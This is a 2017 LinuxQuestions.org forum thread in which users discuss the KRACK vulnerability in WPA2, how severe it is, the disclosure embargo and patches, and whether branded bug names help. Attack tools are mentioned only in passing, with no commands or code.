LinuxQuestions.org
Share your knowledge at the LQ Wiki.
Go Back   LinuxQuestions.org > Forums > Non-*NIX Forums > General
User Name
Password
General This forum is for non-technical general discussion which can include both Linux and non-Linux topics. Have fun!

Notices


Reply
  Search this Thread
Old 10-16-2017, 08:41 AM   #1
suicidaleggroll
LQ Guru
 
Registered: Nov 2010
Location: Colorado
Distribution: OpenSUSE, CentOS
Posts: 5,573

Rep: Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138
WPA2 is dead


A serious vulnerability has been found in WPA2, which brings it to the level of WEP (aka: might as well not have any encryption).

https://www.alexhudson.com/2017/10/1...ken-krack-now/
https://arstechnica.com/information-...eavesdropping/

Thoughts?

Last edited by suicidaleggroll; 10-16-2017 at 08:53 AM.
 
Old 10-16-2017, 08:56 AM   #2
Turbocapitalist
LQ Guru
 
Registered: Apr 2005
Distribution: Linux Mint, Devuan, OpenBSD
Posts: 5,511
Blog Entries: 3

Rep: Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773
Quote:
Originally Posted by suicidaleggroll View Post
(aka: might as well not have any encryption)
That WPA2 has fatally weak encryption has been known for years. I've known people that explained in great detail how to do it. WEP is basically like a paper sticky saying 'Do Not Enter' in place of a hardened lock. WPA2 is that backed up with a large paperclip for a lock.

Anyone using wi-fi should be tunelling, either over SSH or over IPSec or over an SSH VPN or a regular VPN like OpenVPN. Again, that has been clear for many years. I'll have to look at Lede, OpenWRT, DD-WRT more closely so as to be able to make more detailed recommendations about implementing a VPN.

Anyway, this fancy, brand-named bug (complete with a web site and its own domain) is problematic only in that the news was embargoed for so many months and various projects therefore kept from patching for an unreasonable lenght of time. Not that the patch would do much good though, it's still going to be WPA2 at the end of the day. Perhaps for the next wireless encryption standard they will consult some encryption experts. I'm sure there are good ones available for hire for the right pay.
 
Old 10-16-2017, 08:57 AM   #3
ntubski
Senior Member
 
Registered: Nov 2005
Distribution: Debian, Arch
Posts: 3,590

Rep: Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908
Just a flesh wound

See https://www.krackattacks.com/
Quote:
Do we now need WPA3?

No, luckily implementations can be patched in a backwards-compatible manner.
Quote:
Originally Posted by Turbocapitalist View Post
That WPA2 has fatally weak encryption has been known for years. I've known people that explained in great detail how to do it.
Citation? AFAICT, this attack does does not actually directly attack the encryption itself.

Last edited by ntubski; 10-16-2017 at 08:58 AM.
 
Old 10-16-2017, 10:01 AM   #4
suicidaleggroll
LQ Guru
 
Registered: Nov 2010
Location: Colorado
Distribution: OpenSUSE, CentOS
Posts: 5,573

Original Poster
Rep: Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138Reputation: 2138
Quote:
Originally Posted by ntubski View Post
My cursory read through this morning suggested that an attacker could obtain the actual network PSK from a compromised client (which would mean that all it would take was a single unpatched client anywhere on the network to compromise the whole thing), but reading through it again I see now that they can only obtain the encryption key for that specific connection.

This means that any unpatched client will have its own connection decrypted and possibly interfered with, but not the rest of the network. Still bad, but not as bad as I originally thought.

Last edited by suicidaleggroll; 10-16-2017 at 10:04 AM.
 
Old 10-16-2017, 10:23 AM   #5
Turbocapitalist
LQ Guru
 
Registered: Apr 2005
Distribution: Linux Mint, Devuan, OpenBSD
Posts: 5,511
Blog Entries: 3

Rep: Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773
No I won't visit Branded Bug (tm) Custom Web Site and drive traffic their way.

Quote:
Originally Posted by ntubski View Post
Citation?
As for citations, there are two methods described here:
https://www.howtogeek.com/202441/you...E2%80%99s-how/

There are some variations depending on how the network is set up. There are more methods. If you really want to know, there have been guides and howtos for all the setups and some time with a search engine will reveal them.
 
Old 10-16-2017, 11:28 AM   #6
ntubski
Senior Member
 
Registered: Nov 2005
Distribution: Debian, Arch
Posts: 3,590

Rep: Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908
Quote:
Originally Posted by Turbocapitalist View Post
No I won't visit Branded Bug (tm) Custom Web Site and drive traffic their way.
Would you prefer the author's personal site then? https://papers.mathyvanhoef.com/ccs2017.pdf


Quote:
Originally Posted by Turbocapitalist View Post
As for citations, there are two methods described here:
https://www.howtogeek.com/202441/you...E2%80%99s-how/

There are some variations depending on how the network is set up. There are more methods. If you really want to know, there have been guides and howtos for all the setups and some time with a search engine will reveal them.
Quote:
Cracking the WPA Handshake

With the raw data captured, an attacker can use a tool like cowpatty or aircrack-ng along with a “dictionary file” that contains a list of many possible passwords. These files are generally used to speed up the cracking process
[...]
It’s tough to say how long it would take to crack a password in this way. For a good, long password, it could take years, possibly even hundreds of years or longer. If the password is “password”, it would probably take less than a single second.
Okay, humans usually choose weak passwords. I'm not sure that really counts as WPA2 using "weak encryption" though.

Quote:
Breaking WPS With Reaver

There’s also an attack against WPS, an unbelievably vulnerable system that many routers ship with enabled by default.
Yes, WPS is definitely vulnerable, but it's not WPA2.

Quote:
Originally Posted by Turbocapitalist View Post
Anyway, this fancy, brand-named bug (complete with a web site and its own domain) is problematic only in that the news was embargoed for so many months and various projects therefore kept from patching for an unreasonable lenght of time.
Hmm, yeah, in fact:

Quote:
https://www.krackattacks.com/

Why did OpenBSD silently release a patch before the embargo?

OpenBSD was notified of the vulnerability on 15 July 2017, before CERT/CC was involved in the coordination. Quite quickly, Theo de Raadt replied and critiqued the tentative disclosure deadline: “In the open source world, if a person writes a diff and has to sit on it for a month, that is very discouraging”. Note that I wrote and included a suggested diff for OpenBSD already, and that at the time the tentative disclosure deadline was around the end of August. As a compromise, I allowed them to silently patch the vulnerability. In hindsight this was a bad decision, since others might rediscover the vulnerability by inspecting their silent patch. To avoid this problem in the future, OpenBSD will now receive vulnerability notifications closer to the end of an embargo.
 
Old 10-16-2017, 11:35 AM   #7
Turbocapitalist
LQ Guru
 
Registered: Apr 2005
Distribution: Linux Mint, Devuan, OpenBSD
Posts: 5,511
Blog Entries: 3

Rep: Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773Reputation: 2773
Yeah, the WPS method is not WPA2. The deauth + bruteforce method works well enough for WPA2 though, especially with GPUs and or clustered computing available by the hour.

However, if I recall correctly, there is a better but slightly less well-known method. But since I can't or won't cite a source, that's just hearsay.
 
Old 10-16-2017, 10:09 PM   #8
sundialsvcs
LQ Guru
 
Registered: Feb 2004
Location: SE Tennessee, USA
Distribution: Gentoo, LFS
Posts: 9,078
Blog Entries: 4

Rep: Reputation: 3187Reputation: 3187Reputation: 3187Reputation: 3187Reputation: 3187Reputation: 3187Reputation: 3187Reputation: 3187Reputation: 3187Reputation: 3187Reputation: 3187
The wireless password is usually posted at the front counter of the coffee shop.
 
Old 10-16-2017, 11:23 PM   #9
!!!
Member
 
Registered: Jan 2017
Location: Fremont, CA, USA
Distribution: Trying any&ALL on old/minimal
Posts: 726

Rep: Reputation: 310Reputation: 310Reputation: 310Reputation: 310
excessive FUD, cuz "security isn't".

Even CL: https://sfbay.craigslist.org/sfc/pol...348470897.html
Quote:
Major Wi-Fi vulnerability inspires panic
Infosec reporters and experts in my Twitter timeline were losing their minds about this ...
In the research paper he describes the attack as "exceptionally devastating" against Android 6.0.
Me? RFC1918 & minimal door lock. Equifax, Y!, &all shows me: "security isn't".
 
Old 10-17-2017, 01:35 AM   #10
YesItsMe
Member
 
Registered: Oct 2014
Posts: 709

Rep: Reputation: 264Reputation: 264Reputation: 264
Ironically, Windows is secure (once more) as it implements the protocol poorly.

edit: Also, I find protocol bugs with their own name, logo and website sick and the authors should, as always, be ashamed. This is not some funny gadget.

Last edited by YesItsMe; 10-17-2017 at 01:37 AM.
 
Old 10-17-2017, 07:28 AM   #11
ntubski
Senior Member
 
Registered: Nov 2005
Distribution: Debian, Arch
Posts: 3,590

Rep: Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908
Quote:
Originally Posted by YesItsMe View Post
edit: Also, I find protocol bugs with their own name, logo and website sick and the authors should, as always, be ashamed. This is not some funny gadget.
I don't understand your comment about the "funny gadget". IMO, it's actually an effective way of disseminating knowledge of the bug.
 
Old 10-17-2017, 07:43 AM   #12
YesItsMe
Member
 
Registered: Oct 2014
Posts: 709

Rep: Reputation: 264Reputation: 264Reputation: 264
"Here's the new iPad!"

"Enjoy the new Surface Pro!"

"Check out KRACK!"

Oh dear.

Non-tech people won't understand the issue just because you plant a shiny logo on it anyway.
 
Old 10-17-2017, 08:55 AM   #13
IsaacKuo
Senior Member
 
Registered: Apr 2004
Location: Baton Rouge, Louisiana, USA
Distribution: Debian 9 Stretch
Posts: 2,355
Blog Entries: 8

Rep: Reputation: 387Reputation: 387Reputation: 387Reputation: 387
FWIW, Debian already had a patch for this yesterday morning. Which doesn't help my Android devices or my Unifi WAP yet though...
 
Old 10-17-2017, 09:44 AM   #14
ntubski
Senior Member
 
Registered: Nov 2005
Distribution: Debian, Arch
Posts: 3,590

Rep: Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908Reputation: 1908
What's more memorable: "heartbleed" or CVE-2014-0160? Even "tech people" are humans (as much as they would like pretend otherwise).
 
Old 10-17-2017, 09:45 AM   #15
YesItsMe
Member
 
Registered: Oct 2014
Posts: 709

Rep: Reputation: 264Reputation: 264Reputation: 264
Memorability is not the most important aspect of a security hole.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
LXer: The Difference Between Wi-Fi Security Protocols: WPA2-AES vs WPA2-TKIP LXer Syndicated Linux News 0 12-19-2014 12:36 AM
LXer: Wi-Fi Security: Should You Use WPA2-AES, WPA2-TKIP, or Both? LXer Syndicated Linux News 0 12-18-2014 06:47 PM
LXer: The Tablet Dead End Is Dead Ahead LXer Syndicated Linux News 6 07-01-2014 04:36 PM
LXer: SCO is finally “Dead Parrot” dead LXer Syndicated Linux News 0 08-09-2012 02:30 AM
Squid:2nd Browser access Internet SPEED dead becomes dead slow mwj Linux - Software 1 10-04-2003 01:40 PM

LinuxQuestions.org > Forums > Non-*NIX Forums > General

All times are GMT -5. The time now is 02:27 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration